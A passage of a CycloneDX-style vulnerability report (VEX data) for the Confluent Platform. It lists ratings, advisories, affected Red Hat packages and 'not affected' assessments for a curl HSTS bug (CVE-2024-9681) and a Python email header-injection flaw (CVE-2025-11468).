          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-9681",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        697
      ],
      "description": "When curl is asked to use HSTS, the expiry time for a subdomain might\noverwrite a parent domain's cache entry, making it end sooner or later than\notherwise intended.\n\nThis affects curl using applications that enable HSTS and use URLs with the\ninsecure `HTTP://` scheme and perform transfers with hosts like\n`x.example.com` as well as `example.com` where the first host is a subdomain\nof the second host.\n\n(The HSTS cache either needs to have been populated manually or there needs to\nhave been previous HTTPS accesses done as the cache needs to have entries for\nthe domains involved to trigger this problem.)\n\nWhen `x.example.com` responds with `Strict-Transport-Security:` headers, this\nbug can make the subdomain's expiry timeout *bleed over* and get set for the\nparent domain `example.com` in curl's HSTS cache.\n\nThe result of a triggered bug is that HTTP accesses to `example.com` get\nconverted to HTTPS for a different period of time than what was asked for by\nthe origin server. If `example.com` for example stops supporting HTTPS at its\nexpiry time, curl might then fail to access `http://example.com` until the\n(wrongly set) timeout expires. This bug can also expire the parent's entry\n*earlier*, thus making curl inadvertently switch back to insecure HTTP earlier\nthan otherwise intended.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-9681"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/06/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-9681"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-9681.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-9681.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g337-g667-mjvw"
        },
        {
          "url": "https://hackerone.com/reports/2764830"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9681"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241213-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241213-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7104-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-9681"
        }
      ],
      "published": "2024-11-06T08:15:03+00:00",
      "updated": "2026-06-17T08:25:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-11468",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11468"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11468"
        },
        {
          "url": "https://github.com/python/cpython/commit/003b8315669b9f08b1010a49071f73f15f818094"
        },
        {
          "url": "https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2"
        },
        {
          "url": "https://github.com/python/cpython/commit/61614a5e5056e4f61ced65008d4576f3df34acb6"
        },
        {
          "url": "https://github.com/python/cpython/commit/a76e4cd62dd68e7cbe86e37e6ed988495a646b66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e9970f077240c7c670e8a6fc6662f2b30d3b6ad0"
        },
        {
          "url": "https://github.com/python/cpython/commit/f738386838021c762efea6c9802c82de65e87796"
        },
        {
          "url": "https://github.com/python/cpython/issues/143935"
        },
        {
          "url": "https://github.com/python/cpython/pull/143936"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11468"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11468"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:30:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
